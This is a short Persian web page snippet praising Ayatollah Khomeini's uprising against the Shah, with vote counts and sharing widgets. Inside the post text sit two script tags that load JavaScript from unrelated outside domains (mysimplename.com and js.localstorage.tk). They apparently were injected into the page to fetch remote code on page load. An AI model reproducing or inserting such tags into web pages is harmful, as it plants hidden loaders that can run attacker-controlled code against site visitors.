عظمت کار امام را قرن ها بعد خواهند فهمید


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>فکرش را بکنید امام خمینی درشرایطی علیه شاه قیام کرد که هیچکس جرات مخالفت با او را نداشت وحتی برخی آخوندهای درباری به شاه«روحی فداه»میگفتند! <script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
3

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر